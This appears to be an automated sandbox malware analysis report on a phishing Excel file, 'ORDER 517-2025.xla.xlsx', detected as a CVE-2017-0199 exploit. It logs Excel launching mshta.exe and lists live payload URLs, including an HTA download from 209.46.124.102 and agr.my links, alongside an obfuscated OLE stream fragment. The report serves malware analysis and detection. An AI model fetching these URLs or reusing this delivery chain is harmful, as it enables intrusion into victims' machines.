Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 13.107.246.40:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 13.107.246.40:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficHTTP traffic detected: GET /mSGalN?&morning HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownTCP traffic detected without corresponding DNS query: 209.46.124.102
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /mSGalN?&morning HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 209.46.124.102
Source: global trafficDNS traffic detected: DNS query: agr.my
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: ORDER 517-2025.xla.xlsxString found in binary or memory: https://agr.my/mSGalN?&morning&h
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: ORDER 517-2025.xla.xlsxOLE indicator, VBA macros: true
Source: ORDER 517-2025.xla.xlsxStream path 'MBD00E31B39/\x1Ole' : https://agr.my/mSGalN?&morning&h>X F'NQCt:{&Y1#v3}%S`MRBy96Lba+8fng]&QfN/TV:<y2{Od|2+y60KL9*zplypVnjO9PquZChKNo52HNhFXJoj2NHp98mQdmxJVtOnGyX2c21asMPRsXd7o7D4IqX4uUZSFEkNZXkh4aAZI4jY3pXPocD5CgbrdMw9WpKq5VnGKV2KXPKMA5PgkOUpq3jYho8fVNfxmKneqPR1AEhjUwQN3o7RIZdZM80ZO8i6KQf7B2NIEH9j9DCvy1ISEc]w`n!W=z^
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'order 517-2025.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal56.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ORDER 517-2025.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{158D02F6-F51B-4725-81D4-4AFED9FF9DBB} - OProcSessId.datJump to behavior
Source: ORDER 517-2025.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: ORDER 517-2025.xla.xlsxReversingLabs: Detection: 25%
Source: ORDER 517-2025.xla.xlsxVirustotal: Detection: 28%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER 517-2025.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: ORDER 517-2025.xla.xlsxStatic file information: File size 1263104 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ORDER 517-2025.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: ORDER 517-2025.xla.xlsxStream path 'MBD00E31B38/Package' entropy: 7.99513339556 (max. 8.0)
Source: ORDER 517-2025.xla.xlsxStream path 'Workbook' entropy: 7.99540760462 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 891Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648793 Sample: ORDER 517-2025.xla.xlsx Startdate: 26/03/2025 Architecture: WINDOWS Score: 56 19 star-azurefd-prod.trafficmanager.net 2->19 21 shed.dual-low.s-part-0012.t-0009.t-msedge.net 2->21 23 4 other IPs or domains 2->23 31 Multi AV Scanner detection for submitted file 2->31 33 Document exploit detected (process start blacklist hit) 2->33 35 Sigma detected: Suspicious Microsoft Office Child Process 2->35 7 EXCEL.EXE 229 60 2->7         started        11 EXCEL.EXE 45 47 2->11         started        signatures3 process4 dnsIp5 25 209.46.124.102, 49698, 80 SRS-6-Z-7381US United States 7->25 27 s-part-0012.t-0009.t-msedge.net 13.107.246.40, 443, 49700, 49701 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->27 29 agr.my 147.79.86.93, 443, 49697 EKSENBILISIMTR United States 7->29 17 C:\Users\user\...\~$ORDER 517-2025.xla.xlsx, data 7->17 dropped 13 splwow64.exe 1 7->13         started        15 mshta.exe 7->15         started        file6 process7

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ORDER 517-2025.xla.xlsx25%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
ORDER 517-2025.xla.xlsx28%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://agr.my/mSGalN?&morning0%Avira URL Cloudsafe
https://agr.my/mSGalN?&morning&h0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0012.t-0009.t-msedge.net
13.107.246.40
truefalse
    high
    agr.my
    147.79.86.93
    truefalse
      high
      s-0005.dual-s-msedge.net
      52.123.128.14
      truefalse
        high
        otelrules.svc.static.microsoft
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://agr.my/mSGalN?&morningfalse
          • Avira URL Cloud: safe
          unknown
          https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
            high
            https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
              high
              https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://agr.my/mSGalN?&morning&hORDER 517-2025.xla.xlsxfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                209.46.124.102
                unknownUnited States
                7381SRS-6-Z-7381USfalse
                147.79.86.93
                agr.myUnited States
                208485EKSENBILISIMTRfalse
                13.107.246.40
                s-part-0012.t-0009.t-msedge.netUnited States
                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1648793
                Start date and time:2025-03-26 08:23:12 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 20s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name:Without Instrumentation
                Number of analysed new started processes analysed:19
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:ORDER 517-2025.xla.xlsx
                Detection:MAL
                Classification:mal56.expl.winXLSX@6/4@2/3
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                • Excluded IPs from analysis (whitelisted): 52.109.6.53, 23.204.23.20, 52.109.8.36, 23.210.73.6, 23.210.73.5, 20.189.173.10, 52.109.8.89, 20.42.65.88, 52.123.128.14, 52.149.20.212, 40.126.24.82
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, cus-config.officeapps.live.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, login.live.com, eus2-azsc-config.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprdeus08.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, us1.roaming1.live.com.akadns.net, config.of
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                03:25:16API Interceptor933x Sleep call for process: splwow64.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                209.46.124.102PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                • 209.46.124.102/xampp/dvine/devinebestangelcameonearthwitblessnigentiretiem.hta
                PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                • 209.46.124.102/xampp/dvine/devinebestangelcameonearthwitblessnigentiretiem.hta
                PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                • 209.46.124.102/xampp/dvine/devinebestangelcameonearthwitblessnigentiretiem.hta
                147.79.86.93Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
                  Transferencia de pago.xla.xlsxGet hashmaliciousUnknownBrowse
